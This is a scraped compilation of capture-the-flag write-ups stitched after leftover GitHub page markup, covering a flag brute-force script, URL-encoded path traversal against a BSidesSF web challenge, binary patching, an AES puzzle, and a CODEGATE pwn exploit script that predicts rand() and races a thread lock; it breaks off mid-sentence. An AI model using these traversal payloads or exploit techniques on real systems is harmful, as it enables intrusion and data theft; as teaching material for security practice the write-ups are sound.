SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div> </details> </div> <div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div> </div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div> <div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2016-SharifCTF7</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>XOR<span>/</span> </div> </div> <div class="d-flex"> Go to file </div> </div> <div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2016-SharifCTF7</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>XOR<span>/</span></div> <div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/irGeeks/ctf/tree-commit/d5c7ef39469a04e71801fd843497a0fcbf211673/2016-SharifCTF7/Crypto/XOR" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2> <include-fragment src="/irGeeks/ctf/file-list/master/2016-SharifCTF7/Crypto/XOR"> Permalink <div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information. </div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>crypto-xor.py</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div> <div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>enc</span> </div> <div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div> <div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div> </div> </div> </div> </include-fragment> </div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
# RE2: C++ is awesome 100 points> They say C++ is complex, prove them wrong! ## Solution We're given a small binary which takes a single argument and returns either:`Better luck next time` when called with an incorrect flag or `You should havethe flag by now` when called with a part of the flag. [@Pyhscript](https://github.com/Pyhscript) noticed that this allows us to brute-force the flag without actuallyneeding to analyze the binary. This simple script turned out to be enough:```rubyflag = ''until flag[-1] == '}' [*'A'..'Z', *'a'..'z', *'0'..'9', '_', '{', '}'].each do |ch| result = `./re2 #{flag + ch}` if result.include? 'flag' flag += ch break end endendputs flag``` In a few seconds we get the full flag which is`ALEXCTF{W3_L0v3_C_W1th_CL45535}`.
Challenge: Zumbo2 ----------------------------------------Category: Web ----------------------------------------100 points ---------------------------------------- ```Description: Welcome to ZUMBOCOM....you can do anything at ZUMBOCOM.Three flags await. Can you find them? http://zumbo-8ac445b1.ctf.bsidessf.netStage 3 - coming soon! ``` We connect to the site. ```We look at the source code and find hint: We will try a traversal directory on /code/server.py. http://zumbo-8ac445b1.ctf.bsidessf.net/../code/server.py (../) mutliple of 1, 2, 3 etc .... don't match![Errno 2] No such file or directory: u'code/server.py' redirection: on index.template we test null byte %00: http://zumbo-8ac445b1.ctf.bsidessf.net/%00/code/server.pyfile() argument 1 must be encoded string without null bytes, not unicode``` We have a problem with encoded string!!!!!. => %2e/ => %2f We test with:http://zumbo-8ac445b1.ctf.bsidessf.net/%2e%2e%2f%2e%2e/code/server.py Bingo we have the source code and first flag !!!!!! FLAG: FIRST_FLAG_WASNT_HARD and we have the location of the files !!!!!! Connect to http://zumbo-8ac445b1.ctf.bsidessf.net/%2e%2e%2f%2e%2e/flag FLAG: RUNNER_ON_SECOND_BASE ```
Challenge: Easy ----------------------------------------Category: Reversing ----------------------------------------10 points ---------------------------------------- ```Description: This one is easy. File: easy-32 or easy-64``````We decompile the file with Ida pro.``` FLAG:db2f62a36a018bce28e46d976e3f9864
in-plain-sight ```This level is simple: all you have to do is decrypt some HiddenCiphertext! To make it even easier, I'll give you everything you need, except the ciphertext; you have to find that on your own! You will need: Algorithm: AES-256-CBCKey: c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1IV: 0a0e176722a95a623f47fa17f02cc16a```While attempting another challenge on day two, I came across an interesting article that proved crucial to solving in-plain-sight: [Going the other way with padding oracles: Encrypting arbitrary data!](https://blog.skullsecurity.org/2016/going-the-other-way-with-padding-oracles-encrypting-arbitrary-data) What is apparently plaintext, may in fact be the cipher text. And with a title 'in plain sight,' let's look for ciphertext candidates. The 'HiddenCiphertext!' stuck out and I was guessing that it was the ciphertext. Since we need inputs to be multiples of 16, I omitted the exclamation point. Using Python, I converted the key and IV to bytes, and attempted to decrypt 'HiddenCiphertext': ```>>> import binascii>>> from Crypto.Cipher import AES>>> k = binascii.unhexlify('c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1')>>> iv = binascii.unhexlify('0a0e176722a95a623f47fa17f02cc16a')>>> c = 'HiddenCiphertext'>>> aes = AES.new(k, AES.MODE_CBC, iv)>>> aes.decrypt(c)'FLAG:1d010f248d\x01'``` Recon for the win; always do your homework.
RE: Skipper ```0x0804a08e lea eax, dword [ebp - local_40ch]0x0804a094 push eax // The first call:0x0804a095 call sub.memset_871 ; void *memset(void *s, int c, size_t n);0x0804a09a add esp, 0x100x0804a09d sub esp, 80x0804a0a0 lea eax, dword [ebp - local_40ch]0x0804a0a6 push eax0x0804a0a7 push str.Computer_name:__s_n ; str.Computer_name:__s_n ; "Computer name: %s." @ 0x804a31f0x0804a0ac call sym.imp.printf ; int printf(const char *format);0x0804a0b1 add esp, 0x100x0804a0b4 sub esp, 8 // Test string:0x0804a0b7 push str.hax0rz__ ; str.hax0rz__ ; "hax0rz!~" @ 0x804a332 0x0804a0bc lea eax, dword [ebp - local_40ch]0x0804a0c2 push eax // String comparison:0x0804a0c3 call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2);0x0804a0c8 add esp, 0x10 // Test:0x0804a0cb test eax, eax0x0804a0cd je 0x804a0f3``` By examining the file, we can see that it is checking various values; hostname needs to be 'hax0rz!~', OS Version needs to be '2.4.31' and CPU needs to be 'AMDisbetter!'. Passing these three tests leads to 0x08048a63 which seems to do a lot of operations against a few character values, and presumably returns the flag. ```// Start of function related to flag generation0x08048a63 push ebp0x08048a64 mov ebp, esp0x08048a66 sub esp, 0x68 ; 'h'0x08048a69 mov eax, dword gs:[0x14] ; [0x14:4]=10x08048a6f mov dword [ebp - local_ch], eax0x08048a72 xor eax, eax // Loading values that will be decoded to flag0x08048a74 mov dword [ebp - local_35h], 0x343737380x08048a7b mov dword [ebp - local_31h], 0x396434620x08048a82 mov dword [ebp - local_2dh], 0x353437630x08048a89 mov dword [ebp - local_29h], 0x343134610x08048a90 mov dword [ebp - local_25h], 0x353563380x08048a97 mov dword [ebp - local_21h], 0x663834390x08048a9e mov dword [ebp - local_1dh], 0x363362350x08048aa5 mov dword [ebp - local_19h], 0x373366360x08048aac mov dword [ebp - local_15h], 0x656430390x08048ab3 mov dword [ebp - local_11h], 0x38623035``` Since we know that the flag is returned by the application, based on the challenge description, we attempt to patch the executable at its first call to 0x08048871 (call sub.memset_871 in radare2) and replace it with a call to 0x08048a63. Using the patched binary, we score our flag: Result: FLAG:f51579e9ca38ba87d71539a9992887ff
Challenge: Zumbo1 ----------------------------------------Category: Web ----------------------------------------20 points ---------------------------------------- ```Description: Welcome to ZUMBOCOM....you can do anything at ZUMBOCOM.Three flags await. Can you find them? http://zumbo-8ac445b1.ctf.bsidessf.netStages 2 and 3 - coming soon! ``` We connect to the site. ```We look at the source code and find hint: We will try a traversal directory on /code/server.py. http://zumbo-8ac445b1.ctf.bsidessf.net/../code/server.py (../) mutliple of 1, 2, 3 etc .... don't match![Errno 2] No such file or directory: u'code/server.py' redirection: on index.template we test null byte %00:http://zumbo-8ac445b1.ctf.bsidessf.net/%00/code/server.pyfile() argument 1 must be encoded string without null bytes, not unicode``` We have a problem with encoded string!!!!!. => %2e/ => %2f We test with:http://zumbo-8ac445b1.ctf.bsidessf.net/%2e%2e%2f%2e%2e/code/server.py Bingo we have the source code and first flag !!!!!! FLAG: FIRST_FLAG_WASNT_HARD ```
# CODEGATE 2017 Prequalification - pwn - Hunting - 350 pts > Description: Hunting Monster>> ssh [email protected] -p5555 (pw : hunting)>> Attachment: [hunting](hunting) [xpl.py](xpl.py)> # Write-up The hunting binary turned out to be a little game, in which we had to kill a "boss". For this we were provided with different skills, which we could use against him. On every attack, he does a counter-attack and we're able to use a specific shield (ice, fire, wind). If our shield matches his attack, we won't lose any hitpoints. Let's have a look at the disassembled parts of the binary: **Main menu:** ``` c // Initializing random generator with current time as seed v3 = time(0LL); srand(v3); playerActionCount = 0; while ( 2 ) { if ( playerActionCount > 249 ) { puts("Game Over"); result = 0LL; } else if ( byte_6033F0 ) { puts("What's your name?"); scanf("%s", &v9;; result = 0LL; } else { showMenu(); printf("choice:", a2); a2 = (char **)&input; scanf("%d", &input); switch ( input ) { case 1: showHelp(); goto LABEL_12; case 2: a2 = 0LL; pthread_create(&newthread, 0LL, (void *(*)(void *))start_routine, 0LL); goto LABEL_12; case 3: changeSkill((__int64)&game;; goto LABEL_12; case 4: removeSkill((__int64)&game;; goto LABEL_12; case 5: receiveSuggestion();LABEL_12: if ( input == 2 ) { defendFunc((__int64)&game;; sleep(0); } ++playerActionCount; continue; default: result = 0LL; break; } } break; }``` Option 2 is for "Use skill", which lets us attack the boss. It will start a new thread for calculating the player attack against the boss and then calls the "defend"-function (in the main thread), in which the attack from the boss is handled. After that, it will directly loop back into the menu. We should keep that in mind, since this makes it possible to trigger another option, while the attack thread is still running, if executed fast enough. First, we tried to just stay alive and kill the boss by just not dying. To be able to do this, we need to know what attack the boss will be doing next, before it is executed. So let's have a look at the "defend" function: **Defend** ```C puts("\n========================================Boss' Attack"); puts("Boss is Attacking you!"); showShieldMenu(); // Just shows the option we can use printf("choice:"); scanf("%d", &v7;; // Set the shield we're using to 1 switch ( v7 ) { case 2: *(_BYTE *)(a1 + 13) = 1; // fire shield break; case 3: *(_BYTE *)(a1 + 14) = 1; // wind shield break; case 1: *(_BYTE *)(a1 + 12) = 1; // ice shield break; } // Calculate the attack the boss will use bossAttackRand = rand(); v8 = bossAttackRand; bossAttack = ((((unsigned int)((unsigned __int64)bossAttackRand >> 32) >> 30) + (_BYTE)bossAttackRand) & 3) - ((unsigned int)((unsigned __int64)bossAttackRand >> 32) >> 30); v9 = bossAttack; if ( bossAttack == 1 ) { if ( *(_BYTE *)(a1 + 14) ) { puts("You succeed in defense"); } else { v4 = *(_QWORD *)a1; *(_QWORD *)a1 = v4 - return250_2(); } } else if ( bossAttack == 2 ) { if ( *(_BYTE *)(a1 + 13) ) { puts("You succeed in defense"); } else { v5 = *(_QWORD *)a1; *(_QWORD *)a1 = v5 - return250(); } } else if ( !bossAttack ) { if ( *(_BYTE *)(a1 + 12) ) { puts("You succeed in defense"); } else { v3 = *(_QWORD *)a1; *(_QWORD *)a1 = v3 - return250_3(); } } resetShields(a1); showPlayerHP((_QWORD *)a1); puts("========================================");``` So it basically just uses ```crand() & 3``` to calculate the attack, the boss will be using. Since the random generator was initialized with the current time as seed, we should easily be able to guess the attack every time and use the appropriate shield by initializing our own random generator with the same time (which is just current time at process start). We'll have to bear in mind, that in the player attack thread also a rand() is used to calculate the damage the player is doing to the boss. So we'll need to consume two rand()'s per round to stay in sync with the app rng. So we'll start just casting iceball again and again, while defending perfectly against the boss attacks. **First try** ```python#!/usr/bin/pythonfrom pwnlib.tubes import processfrom ctypes import *import sys, time, re cdll.LoadLibrary("libc.so.6")libc = CDLL("libc.so.6") playerLevel = 1playerHP = 500bossHP = 100counter = 0 # Change curently used skilldef changeskill(skill): r.sendline('3') r.sendline(str(skill)) r.recvuntil("Exit\n") # Get the matching shield countering the boss attackdef getShieldToUse(attack): if attack == 1: return 3 elif attack == 2: return 2 else: return 1 # just a helper to match current statesdef findValue(pattern, msg, defValue): match = re.search(pattern, msg, re.S) if match: return int(match.group(1)) return defValue # check for state changes in server responsesdef checkForStates(msg): global playerLevel, bossHP, playerHP playerLevel = findValue("level:(.?)\n", msg, playerLevel) bossHP = findValue("Boss's hp is (.+?)\n", msg, bossHP) playerHP = findValue("Your HP is (.+?)\n", msg, playerHP) # Call the "Use skill" option to attack the boss and defend against his attackdef useskill(): global counter, playerLevel, playerHP, bossHP # print out some info print ("") print ("Start attack round") print ("") print (" [+] Current level : %d" % playerLevel) print (" [+] Player HP : %d" % playerHP) print (" [+] Boss HP : %d" % bossHP) print ("") # Send "Use skill" r.sendline('2') libc.rand() # consume rand for player attack in attack thread bossAttack = libc.rand() & 3 # rand for boss attack in defend function time.sleep(0.1) useShield = getShieldToUse(bossAttack) # Send the shield we want to use to the server r.sendline(str(useShield)) # Receive responses and update player states checkForStates(r.recv(timeout=1)) checkForStates(r.recvuntil("Exit\n", timeout=1)) def exploit(r): r.recvuntil("Exit\n", timeout=0.2) # Select iceball changeskill(3) while 1: # Keep attacking useskill() r = process.process("./hunting") # Initialize rng with current timelibc.srand(libc.time(None)) exploit(r)``` Ok, that made us invincible for now, so it wasn't a problem anymore to kill the boss without losing any health: ```shell$ python xplshield.py [+] Started program './hunting' Start attack round [+] Current level : 1 [+] Player HP : 500 [+] Boss HP : 100 Start attack round [+] Current level : 2 [+] Player HP : 500 [+] Boss HP : -502 [SNIP] Start attack round [+] Current level : 3 [+] Player HP : 500 [+] Boss HP : 580 Start attack round [+] Current level : 4 [+] Player HP : 500 [+] Boss HP : -136 Start attack round [+] Current level : 4 [+] Player HP : 500 [+] Boss HP : 9223372036854775033 Start attack round [+] Current level : 4 [+] Player HP : 500 [+] Boss HP : 9223372036854774952``` But at level 4, the boss hp jumped up just a "little bit". Since our damage value is calculated in 32bit, it would've taken forever to kill the boss this way. So we need another approach to kill the boss faster. Let's check how the player damage is calculated: ```C puts("\n========================================Skill Activation"); printf("\rYou use %s\n", a1 + 32); for ( i = 0; i <= 8 && strcmp((const char *)(a1 + 32), &aAttack[32 * i]); ++i ); executePlayerAttack(a1 + 32); if ( useSkillLockObject ) { printf("You are already using the skill. Skill failed to use:%s\n", a1 + 32); } else { useSkillLockObject = 1; if ( i <= 4 ) { // Check that the damage value isn't negative if ( *(_QWORD *)(a1 + 72) < 0LL ) { puts("Damage can't be negative number!"); } else { // Subtract the rand()-value from boss hp (converts the 32bit dmg to 64bit signed with cdqe before) *(_QWORD *)(a1 + 24) -= (signed int)*(_QWORD *)(a1 + 72); printf("Boss's hp is %ld\n", *(_QWORD *)(a1 + 24)); } } // Check that the damage value isn't negative else if ( *(_QWORD *)(a1 + 72) < 0LL ) { puts("Damage can't be negative number!"); } else { // Subtract the rand() value from boss hp *(_QWORD *)(a1 + 24) -= *(_QWORD *)(a1 + 72); printf("Boss's hp is %ld\n", *(_QWORD *)(a1 + 24)); } checkBossDeath((__int64)&game;; useSkillLockObject = 0; } *(_QWORD *)(a1 + 72) = 0LL; return puts("\n=======================================");}``` In the executePlayerAttack function, it will check for the skill we're currently using and depending on it, our damage will be calculated . Just a quick peek at some skills and their calculations: **Iceball**```C sleep(0); result = (unsigned __int64)executeIceball((_QWORD *)(a1 + 40));``````C v1 = (unsigned __int16)rand() % 1000; *a1 = v1; // Damage for iceball``` **Fireball**```C executeFireball((_QWORD *)(a1 + 40)); result = sleep(1u);``` ```c v1 = (rand() % 1000 << 16) % 100; *a1 = v1; // Damage for fireball``` **Icesword**```c executeIcesword((_QWORD *)(a1 + 40)); result = sleep(1u);``````c v1 = (unsigned __int16)rand(); v2 = (rand() << 16) & 0x8FFFFFFF | v1; v3 = v2 | ((signed __int64)rand() << 32) & 0xFFFF00000000LL; *a1 = 0xFFFFFFFFLL; // Damage for icesword``` So there are some subtile differences between those skills. - Iceball can do a good amount of damage (0-1000). - Fireball can do a max damage of 100, but it lets the attack thread sleep for 1 second, which iceball doesn't.- Icesword seems to be calculating alot but in reality it just always returns "-1" as dmg (0xffffffff in 32 bit) Back to the attacking thread. It tries to "lock" the attack calculation with an if/else checking if a "lock object" is set. ```cif ( useSkillLockObject ) { printf("You are already using the skill. Skill failed to use:%s\n", a1 + 32); } else { useSkillLockObject = 1;``` One of the most common examples of how **not** to implement "thread safety". Since we're multi-threading, the attack thread can suspend on every instruction, letting other threads (like the main thread) do something. The attack thread will then check, if we're using a skill below or equal "4", and if so, subtracts its damage value from the boss hp 